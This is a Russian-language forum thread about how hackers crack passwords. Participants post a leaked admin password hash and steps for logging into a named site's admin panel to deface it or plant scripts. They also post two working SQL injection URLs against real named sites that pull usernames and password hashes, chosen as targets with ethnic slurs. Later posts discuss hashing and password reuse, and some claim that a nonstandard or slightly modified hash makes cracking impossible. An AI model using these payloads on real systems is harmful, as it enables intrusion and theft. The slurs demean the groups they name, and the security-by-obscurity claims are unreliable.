Почему хакеры так легко и просто взламывают наши пароли?

[welcomeinside]

А дальше уже дело техники получить все что интересует из БД.

а подробнее?

 

[Федор]

а подробнее?

а смысл? Готового рецепта всё равно не существует.

 

[welcomeinside]

Убери пробел в слове password

ого!!

admin:f07d3c8387f1b52f26e3b2ea5cc82f84d945ce12


а чо с этим дальше делать?

 

[welcomeinside]

а смысл? Готового рецепта всё равно не существует.

как? не существует?

у меня смысл - взломать свой собственный ящик.

 

[Черный Лотос]

чо с этим дальше делать?

Берешь программу типа md5inside и расшифровываешь его.
Так ты узнаешь пароль админа.
Потом заходишь по адресу http://www.resolutiondev.com/admin/login.php
вводишь туда имеющееся данные и все. Можешь глумится над сайтом.
Или попробовать разместить там скрипты свои.

 

[Федор]

как? не существует?

у меня смысл - взломать свой собственный ящик.

ящик на resolutiondev.com?
Если какой-то наивный товарищ оставляет ключи от квартиры под ковриком, то это совсем не значит, что ключи от банковского хранилища тоже лежат под ковриком в банке.

 

[welcomeinside]

ящик на resolutiondev.com?

не. на chat.ru

 

[Водитель_Камаза]

это не мд5 хэш, а SHA-1

 

[Федор]

не. на chat.ru

тогда в чем смысл ломиться на resolutiondev.com?

 

[Johnny Mnemonic]

тогда в чем смысл ломиться на resolutiondev.com?

Исходя из:

welcomeinside, тренируйся на кошках
пендосах
например
возможна инъекция

http://www.resolutiondev.com/content.php?id=-41+union+select+1,2,3,group_concat(username,0x3a,p%20assword),5,6,7+from+tbl_admin%20--

или на хачиках

http://old.sms-kavkaz.ru/ind.php?pn=0&id_categ=-3+union+select+version(),2,3,4,5,6,user(),8,9,10,1%20%201,12,13,14,15,16,17,18,19,20,21,22,23,24,25+--+

читай профильные форумы и будешь крутым хацкером

Тренируется

 

[LordKor]

Гы !

В общем хакеры и взломщики паролей, это выдумки ?

В том виде, как показаны в фильмах и книгах - полная фигня.
Обычно "хакерами" прикрывают:
- инсайдерские сливы
- криворукость админов, не закрывающих известные дыры в ПО
- "все уже украдено до нас"

Большинство "хакеров" используют человеческий фактор - тем или иным способом провоцируют пользователя сообщить свои данные (типа как "сотрудник банка" "уточняет" по телефону или имэйлу номер карты и пин-код) - трояны-килоггеры, фэйковые вэб-страницы и т.п.
Здесь обсуждается один из "сферических" вариантов: дырявый сервак со стандартным алгоритмом вычисления хэша пароля и хакер, вытащивший через дырку базу хэшй с соответствующими логинами и спокойно ее перебирающий. В реале такое, конечно, тоже возможно, если админ - полный даун.
В нормальной системе:
- нет известных дыр, через которые можно вытащить базу - а если такие дыры находят, то их очень быстро закрывают
- хэш пароля считается нестандартным алгоритмом, который недоступен для злоумышленника

В общем-то, в последние пару лет неоднократно находили дыры в системах крупных инет-лабазов, а то и такого крупняка, как SOE - и стягивали базы юзеров. И, насколько я помню, каждый раз выяснялось, что о наличии этой дыры специалисты предупреждали задолго до кражи, а вытаскивать из этих баз удавалось только ту инфу, которая либо лежала открыто, либо кодировалась известными стандартными алгоритмами.

Взлом удаленных систем без дыр подбором пароля невозможен в принципе - просто после нескольких ошибочных попыток ввода пароля блокируется вход - причем, нормальные системы реагируют и на всякие хитрости и пакости. Остаются дырки, закладки и "человеческий фактор", предоставляющий пароль в открытом виде. Кстати, зачастую дырки и закладки находят не в самой системе доступа, а в других службах и программах, запущенных на сервере - то бишь, защита просто обходится - типа как бронированная дверь с сейфовым замком посреди штакетника. Помнится, один из наиболее известных хаков юниксовых систем в свое время основывался на том, что стандартный почтовый сервис (sendmail) в определенных нештатных случаях запускал процесс с админскими полномочиями.

 

[Sprut]

как? не существует?

у меня смысл - взломать свой собственный ящик.

Взломал?

 

[!Chip]

В нормальной системе:
- нет известных дыр, через которые можно вытащить базу - а если такие дыры находят, то их очень быстро закрывают
- хэш пароля считается нестандартным алгоритмом, который недоступен для злоумышленника

А что есть нормальная система? и что есть не стандартные алгоритмы хеша?

З.Ы. Чёт мне вспомнились свичи HP по моему 1ХХХ серии на которые заходишь в вебку вводишь в качестве логина и пароля любые символы в кириллице, и свич перегружается

 

[Федор]

и что есть не стандартные алгоритмы хеша?

ну как что, вместо проверенных грамотными специалистами алгоритмов с известной стойкостью взять какую-нибудь мульку типа crc:=crc + (a XOR rand()) и надеяться, что ее никто не сломает, потому что никто не знает

 

[LordKor]

А что есть нормальная система?

Система, в которой нельзя воспользоваться известными эксплойтами.

и что есть не стандартные алгоритмы хеша?

Видимо, некий проприетарный криптоалгоритм, а не MD5 сотоварищи.

ну как что, вместо проверенных грамотными специалистами алгоритмов с известной стойкостью взять какую-нибудь мульку типа crc:=crc + (a XOR rand()) и надеяться, что ее никто не сломает, потому что никто не знает

Вообще-то предполагается, что нормальную систему создают грамотные специалисты...

 

[Федор]

Видимо, некий проприетарный криптоалгоритм, а не MD5 сотоварищи.

в курсе, как разрабатываются криптоалгоритмы, как их тестируют на стойкость и сколько времени на это нужно? И, главное, зачем?

 

[LordKor]

в курсе, как разрабатываются криптоалгоритмы, как их тестируют на стойкость и сколько времени на это нужно? И, главное, зачем?

Затем, чтобы свистнув базу акков нельзя было ломануть пароли, с чем столкнулись уже многие крупные игроки инет-продаж.
Вся тема именно этому и посвящена - имея базу с логинами и хэшами паролей можно за сравнительно небольшое время подобрать пароли, используя стандартные криптоалгоритмы. Если используется не стандартный алгоритм - достаточно сравнительно небольшой модификации - то подобрать пароль будет гораздо сложнее - при грамотной корректировке в принципе невозможно, при беграмотной может найтись способ подбора после того, как хакер выяснит, что алгоритм не стандартный.

 

[Федор]

Если используется не стандартный алгоритм - достаточно сравнительно небольшой модификации - то подобрать пароль будет гораздо сложнее - при грамотной корректировке в принципе невозможно

:swoon2:
прежде, чем выдавать такие перлы, почитайте, хотя бы Брюса Шнайера. Небольшая модификация или оставит стойкость прежней (просто хэш сдвинется в другую область) или ослабит стойкость.

можно за сравнительно небольшое время подобрать пароли

попробуйте, например, подобрать для алгоритма ГОСТ Р 34.11 (а на территории РФ использовать другие для официального информационного обмена запрещено).

 

[Федор]

Затем, чтобы свистнув базу акков нельзя было ломануть пароли, с чем столкнулись уже многие крупные игроки инет-продаж.

сразу и не допер, действительно, если в базе хранится не модифицированный хэш, то подобрав по словарю пароль, можно зайти на сайт. Только, что там делать, если уже есть доступ к БД?

 

[Demon™]

сразу и не допер, действительно, если в базе хранится не модифицированный хэш, то подобрав по словарю пароль, можно зайти на сайт. Только, что там делать, если уже есть доступ к БД?

А дальше срабатывает психология. Человек - существо, как правило, ленивое. Он обычно использует одну и ту же пару логин-пароль во всех сервисах. В т.ч., например, платёжных.